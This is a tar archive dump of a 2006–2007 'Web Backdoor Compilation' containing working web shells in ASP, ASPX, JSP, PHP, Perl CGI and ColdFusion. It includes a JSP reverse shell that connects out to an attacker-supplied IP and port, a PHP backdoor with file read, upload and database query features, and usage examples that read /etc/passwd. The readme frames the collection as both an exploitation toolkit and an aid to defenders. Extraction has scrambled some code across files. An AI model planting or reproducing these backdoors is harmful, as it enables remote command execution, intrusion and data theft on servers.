wbc-v1b/ 0000750 0001547 0001550 00000000000 10610167177 012420 5 ustar michaeld michaeld wbc-v1b/cmd-asp-5.1.asp 0000640 0001547 0001550 00000002260 10541534050 014742 0 ustar michaeld michaeld <% ' ASP Cmd Shell On IIS 5.1 ' brett.moore_at_security-assessment.com ' http://seclists.org/bugtraq/2006/Dec/0226.html Dim oS,oSNet,oFSys, oF,szCMD, szTF On Error Resume Next Set oS = Server.CreateObject("WSCRIPT.SHELL") Set oSNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFSys = Server.CreateObject("Scripting.FileSystemObject") szCMD = Request.Form("C") If (szCMD <> "") Then szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() ' Here we do the command Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """",0,True) response.write szTF ' Change perms Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F",0,True) Set oF = oFSys.OpenTextFile(szTF,1,False,0) End If %>
Machine: <%=oSNet.ComputerName%>
Username: <%=oSNet.UserName%>
<% If (IsObject(oF)) Then On Error Resume Next Response.Write Server.HTMLEncode(oF.ReadAll) oF.Close Call oS.Run("win.com cmd.exe /c del "& szTF,0,True) End If %> wbc-v1b/cmdasp.asp 0000640 0001547 0001550 00000002766 10541534062 014402 0 ustar michaeld michaeld <%@ Language=VBScript %> <% ' --------------------o0o-------------------- ' File: CmdAsp.asp ' Author: Maceo' Release: 2000-12-01 ' OS: Windows 2000, 4.0 NT ' ------------------------------------------- Dim oScript Dim oScriptNet Dim oFileSys, oFile Dim szCMD, szTempFile On Error Resume Next ' -- create the COM objects that we will be using -- ' Set oScript = Server.CreateObject("WSCRIPT.SHELL") Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") ' -- check for a command that we have posted -- ' szCMD = Request.Form(".CMD") If (szCMD <> "") Then ' -- Use a poor man's pipe ... a temp file -- ' szTempFile = "C:\" & oFileSys.GetTempName( ) Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) End If %> <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %><%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s; } } catch(IOException e) { e.printStackTrace(); } } %>
<% If (IsObject(oFile)) Then ' -- Read the output from our command and remove the temp file -- ' On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) oFile.Close Call oFileSys.DeleteFile(szTempFile, True) End If %> wbc-v1b/cmdjsp.jsp 0000640 0001547 0001550 00000001325 10541534276 014421 0 ustar michaeld michaeld // note that linux = cmd and windows = "cmd.exe /c + cmd"<%=output %>wbc-v1b/jsp-reverse.jsp 0000640 0001547 0001550 00000004623 10541534454 015410 0 ustar michaeld michaeld // backdoor.jsp // http://www.security.org.sg/code/jspreverse.html <%@ page import="java.lang.*, java.util.*, java.io.*, java.net.*" % > <%! static class StreamConnector extends Thread { InputStream is; OutputStream os; StreamConnector(InputStream is, OutputStream os) { this.is = is; this.os = os; } public void run() { BufferedReader isr = null; BufferedWriter osw = null; try { isr = new BufferedReader(new InputStreamReader(is)); osw = new BufferedWriter(new OutputStreamWriter(os)); char buffer[] = new char[8192]; int lenRead; while( (lenRead = isr.read(buffer, 0, buffer.length)) > 0) { osw.write(buffer, 0, lenRead); osw.flush(); } } catch (Exception ioe) try { if(isr != null) isr.close(); if(osw != null) osw.close(); } catch (Exception ioe) } } %>JSP Backdoor Reverse Shell
<% String ipAddress = request.getParameter("ipaddress"); String ipPort = request.getParameter("port"); if(ipAddress != null && ipPort != null) { Socket sock = null; try { sock = new Socket(ipAddress, (new Integer(ipPort)).intValue()); Runtime rt = Runtime.getRuntime(); Process proc = rt.exec("cmd.exe"); StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream()); StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream()); outputConnector.start(); inputConnector.start(); } catch(Exception e) } %> wbc-v1b/php-backdoor.php 0000640 0001547 0001550 00000005360 10541533475 015510 0 ustar michaeld michaeld // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\ ob_implicit_flush(); if(isset($_REQUEST['f'])){ $filename=$_REQUEST['f']; $file=fopen("$filename","rb"); fpassthru($file); die; } if(isset($_REQUEST['d'])){ $d=$_REQUEST['d']; echo ""; if ($handle = opendir("$d")) { echo ""; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd wbc-v1b/perlcmd.cgi 0000644 0001547 0001550 00000001111 10610162503 014515 0 ustar michaeld michaeld #!/usr/bin/perl -w use strict; print "Cache-Control: no-cache\n"; print "Content-type: text/html\n\n"; my $req = $ENV{QUERY_STRING}; chomp ($req); $req =~ s/%20/ /g; $req =~ s/%3b/;/g; print ""; print ''; if (!$req) { print "Usage: http://target.com/perlcmd.cgi?cat /etc/passwd"; } else { print "Executing: $req"; } print "listing of $d
"; while ($dir = readdir($handle)){ if (is_dir("$d/$dir")) echo ""; else echo ""; echo "$dir\n"; echo ""; } } else echo "opendir() failed"; closedir($handle); die ("
"); } if(isset($_REQUEST['c'])){ echo ""; system($_REQUEST['c']); die; } if(isset($_REQUEST['upload'])){ if(!isset($_REQUEST['dir'])) die('hey,specify directory!'); else $dir=$_REQUEST['dir']; $fname=$HTTP_POST_FILES['file_name']['name']; if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname)) die('file uploading error.'); } if(isset($_REQUEST['mquery'])){ $host=$_REQUEST['host']; $usr=$_REQUEST['usr']; $passwd=$_REQUEST['passwd']; $db=$_REQUEST['db']; $mquery=$_REQUEST['mquery']; mysql_connect("$host", "$usr", "$passwd") or die("Could not connect: " . mysql_error()); mysql_select_db("$db"); $result = mysql_query("$mquery"); if($result!=FALSE) echo "query was executed correctly
\n"; while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); mysql_free_result($result); die; } ?>
to browse go to http:// echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
for example: http:// echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix or http:// echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
execute mysql query: wbc-v1b/readme.txt 0000640 0001547 0001550 00000002375 10610167164 014422 0 ustar michaeld michaeld Web Backdoor Compilation (wbc) DK (http://michaeldaw.org) Changelog Date Change 14 Apr 07 Version 1b (pre 1.2 release): perlcmd.cgi, cfexec.cfm, cmdasp.aspx Dec/06 Version 1 release. I have collected some web backdoors in the past to exploit vulnerable file upload facilities and others. I think a library like this may be useful in a variety of situations. Understanding how these backdoors work can help security administrators implement firewalling and security policies to mitigate obvious attacks. The package includes: Filename Contributor MD5 cmd-asp-5.1.asp Brett Moore 8baa99666bf3734cbdfdd10088e0cd9f cmdasp.asp Maceo 57b51418a799d2d016be546f399c2e9b cmdasp.aspx Dominic Chell 5e83b6ed422399de04408b80f3e5470e cmdjsp.jsp Unknown b815611cc39f17f05a73444d699341d4 jsp-reverse.jsp Tan Chew Keong 8b0e6779f25a17f0ffb3df14122ba594 php-backdoor.php z0mbie 2b5cb105c4ea9b5ebc64705b4bd86bf7 simple-backdoor.php David Kierznowski f091d1b9274c881f8e41b2f96e6b9936 perlcmd.cgi David Kierznowski 97ae7222d7f13e908c6d7f563cb1e72b cfexec.cfm Kurt Grutzmacher bd04f47283c53ca0ce6436a79ccd600f Note: readme.txt is also included in this package but not listed here. The MD5 values identify these exact files only; a copy that has been edited in any way will hash differently, so a hash match is not sufficient on its own to find these scripts on a server. If you have contributions, please let me know so that I can add them to a later release. wbc-v1b/simple-backdoor.php 0000640 0001547 0001550 00000000510 10541536457 016205 0 ustar michaeld michaeld "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; my @cmd = `$req`; print ""; foreach my $line (@cmd) { print $line . "
"; } print ""; # wbc-v1b/cmdasp.aspx 0000644 0001547 0001550 00000002570 10610154643 014567 0 ustar michaeld michaeld <%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %>awen asp.net webshell wbc-v1b/cfexec.cfm 0000644 0001547 0001550 00000002405 10610154464 014345 0 ustar michaeld michaeld Notes:
- Prefix DOS commands with "c:\windows\system32\cmd.exe /c <command>" or wherever cmd.exe is
- Options are, of course, the command line options you want to run
- CFEXECUTE could be removed by the admin. If you have access to CFIDE/administrator you can re-enable it
#myVar#